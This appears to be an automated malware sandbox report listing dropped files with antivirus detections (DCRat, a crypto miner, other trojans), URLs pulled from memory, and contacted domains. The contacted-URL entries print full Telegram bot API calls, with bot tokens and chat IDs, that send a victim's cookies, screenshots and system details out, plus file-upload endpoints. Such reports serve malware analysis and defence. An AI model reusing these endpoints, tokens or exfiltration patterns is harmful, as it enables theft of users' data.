C:\Users\user\AppData\Local\Temp\_MEI75002\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\python311.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	92%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\Desktop\CyikYrPX.log	17%	ReversingLabs
C:\Users\user\Desktop\DhbSKVVV.log	9%	ReversingLabs
C:\Users\user\Desktop\FjOAgEaQ.log	21%	ReversingLabs
C:\Users\user\Desktop\FslAQrtN.log	8%	ReversingLabs
C:\Users\user\Desktop\IibrXntG.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\NMiIKuxG.log	12%	ReversingLabs
C:\Users\user\Desktop\NedIeTjA.log	8%	ReversingLabs
C:\Users\user\Desktop\NvkaspdC.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\OaRiuQGD.log	8%	ReversingLabs
C:\Users\user\Desktop\QXsqPQUy.log	17%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\SQHZBNGw.log	12%	ReversingLabs
C:\Users\user\Desktop\bIypVceb.log	5%	ReversingLabs
C:\Users\user\Desktop\bRVpFOxY.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\cAOXqsEV.log	8%	ReversingLabs
C:\Users\user\Desktop\etdFcppU.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\gngVTpTJ.log	12%	ReversingLabs
C:\Users\user\Desktop\jXYEVzlL.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\qNclTfFu.log	12%	ReversingLabs
C:\Users\user\Desktop\qVMExOgA.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\qejEhBzx.log	17%	ReversingLabs
C:\Users\user\Desktop\texuZkSn.log	21%	ReversingLabs
C:\Users\user\Desktop\uLCuFLgt.log	29%	ReversingLabs
C:\Windows\Logs\SettingSync\cmd.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Windows\Resources\audiodg.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate

Source	Detection	Scanner	Label
https://www.avito.ru/	0%	URL Reputation	safe
https://www.ctrip.com/	0%	URL Reputation	safe
https://www.leboncoin.fr/	0%	URL Reputation	safe
https://tools.ietf.org/html/rfc2388#section-4.4	0%	URL Reputation	safe
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	URL Reputation	safe
https://weibo.com/	0%	URL Reputation	safe
https://urllib3.r	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0205/	0%	URL Reputation	safe
https://python.org/dev/peps/pep-0263/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://www.reddit.com/	0%	URL Reputation	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
https://www.amazon.ca/	0%	URL Reputation	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	URL Reputation	safe
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	0%	Avira URL Cloud	safe
https://www.ebay.co.uk/	0%	URL Reputation	safe
https://www.ebay.de/	0%	URL Reputation	safe
https://www.msn.com	0%	Avira URL Cloud	safe
http://cacerts.digi	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://httpbin.org/	0%	URL Reputation	safe
http://www.microsoftNAV_CO~1.JSOy.	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.28%20kb)	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%202919%0A%E2%84%B9%EF%B8%8FSend%20%22/2919*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	0%	Avira URL Cloud	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Avira URL Cloud	safe
https://allegro.pl/	0%	URL Reputation	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	URL Reputation	safe
https://www.amazon.com/	0%	Avira URL Cloud	safe
https://MD8.mozilla.org/1/m	0%	URL Reputation	safe
https://github.com/python/cpython/issues/86361.	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20065367%0AUser%20name:%20user%0ASystem%20time:%202024-09-02%2010:50:41%20am%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20654VB%0ARAM:%204095%20MB%0AHWID:%2073CF150472%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True	0%	Avira URL Cloud	safe
https://bugzilla.mo	0%	URL Reputation	safe
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	0%	Avira URL Cloud	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	0%	Avira URL Cloud	safe
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	0%	URL Reputation	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Avira URL Cloud	safe
https://www.python.org/psf/license/	0%	Avira URL Cloud	safe
https://foss.heptapod.net/pypy/pypy/-/issues/3539	0%	URL Reputation	safe
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20taken	0%	Avira URL Cloud	safe
https://www.bbc.co.uk/	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://api.anonfiles.com/uploadr	0%	Avira URL Cloud	safe
https://google.com/mail	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Avira URL Cloud	safe
https://account.bellmedia.c	0%	URL Reputation	safe
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://html.spec.whatwg.org/multipage/	0%	URL Reputation	safe
https://www.ifeng.com/	0%	URL Reputation	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	0%	URL Reputation	safe
https://www.iqiyi.com/	0%	Avira URL Cloud	safe
https://www.google.com/	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	0%	Avira URL Cloud	safe
http://www.iana.org/time-zones/repository/tz-link.html	0%	URL Reputation	safe
http://google.com/	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://discordapp.com/api/v9/users/	0%	Avira URL Cloud	safe
https://api.gofile.io/getServerr	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	0%	Avira URL Cloud	safe
https://json.org	0%	URL Reputation	safe
https://www.wykop.pl/	0%	URL Reputation	safe
https://www.python.org/download/releases/2.3/mro/.	0%	Avira URL Cloud	safe
http://ip-api.com/json/?fields=225545r	0%	Avira URL Cloud	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	0%	Avira URL Cloud	safe
https://www.olx.pl/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefox	0%	URL Reputation	safe
https://github.com/urllib3/urllib3/issues/2920	0%	Avira URL Cloud	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	0%	Avira URL Cloud	safe
https://yahoo.com/	0%	Avira URL Cloud	safe
http://www.microsoftENCRYP~1JSOy.	0%	Avira URL Cloud	safe
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	0%	Avira URL Cloud	safe
https://www.zhihu.com/	0%	Avira URL Cloud	safe
http://cacerts.digicert.co	0%	Avira URL Cloud	safe
http://ip-api.com/json/	0%	Avira URL Cloud	safe
http://www.microsoftCONSM~1JSOy.	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument	0%	Avira URL Cloud	safe
http://cacerts.digiH	0%	Avira URL Cloud	safe
https://www.amazon.co.uk/	0%	Avira URL Cloud	safe
https://api.gofile.io/getServer	0%	Avira URL Cloud	safe
https://www.python.org/dev/peps/pep-0205/	0%	Avira URL Cloud	safe
https://twitter.com/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7337890485:AAHJolyS1xe_Y4XOAIPHADM1TG5Ae02NIcU/sendDocument	0%	Avira URL Cloud	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package	0%	Avira URL Cloud	safe
https://google.com/	0%	Avira URL Cloud	safe
http://cacerts.digicert.coH	0%	Avira URL Cloud	safe
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module	0%	Avira URL Cloud	safe
https://google.com/mail/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
raw.githubusercontent.com	185.199.108.133	true	false	unknown
ip-api.com	208.95.112.1	true	false	unknown
api.telegram.org	149.154.167.220	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.28%20kb)	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%202919%0A%E2%84%B9%EF%B8%8FSend%20%22/2919*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20065367%0AUser%20name:%20user%0ASystem%20time:%202024-09-02%2010:50:41%20am%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20654VB%0ARAM:%204095%20MB%0AHWID:%2073CF150472%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20taken	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7337890485:AAHJolyS1xe_Y4XOAIPHADM1TG5Ae02NIcU/sendDocument	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://urllib3.r	based.exe, 00000008.00000003.2143028640.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.avito.ru/	based.exe, 00000008.00000002.2801754901.000001F16D7BC000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ctrip.com/	based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://python.org/dev/peps/pep-0263/	hacn.exe, 00000009.00000002.2070711669.00007FF8A882F000.00000002.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029611666.0000021B8C461000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028820443.0000021B8C45E000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2030262354.0000021B8E0F0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057005493.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2062517146.000002471A396000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2063800528.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057088286.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067150043.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2061298138.000002471A384000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.leboncoin.fr/	based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tools.ietf.org/html/rfc2388#section-4.4	based.exe, 00000008.00000002.2799454783.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16CEF1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://weibo.com/	based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/upload	based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com	based.exe, 00000008.00000002.2802048410.000001F16D9CC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	based.exe, 00000008.00000002.2801663781.000001F16D5E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digi	based.exe, 00000007.00000003.2050911110.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0205/	based.exe, 00000008.00000003.2067718657.000001F16CF2E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2069014031.000001F16CF2F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2070735469.000001F16CF2F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2060409720.000001F16CF2E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799365903.000001F16CDE0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoftNAV_CO~1.JSOy.	based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reddit.com/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.ca/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	based.exe, 00000008.00000003.2114168132.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC98000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C868000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067655551.000002471BFCC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ebay.co.uk/	based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.de/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	iqA8j9yGcd.exe, 00000002.00000002.2029846639.0000021B8DF20000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799159126.000001F16CAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029611666.0000021B8C461000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028820443.0000021B8C45E000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2030262354.0000021B8E0F0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057005493.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2062517146.000002471A396000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2063800528.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057088286.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067150043.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2061298138.000002471A384000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/	based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
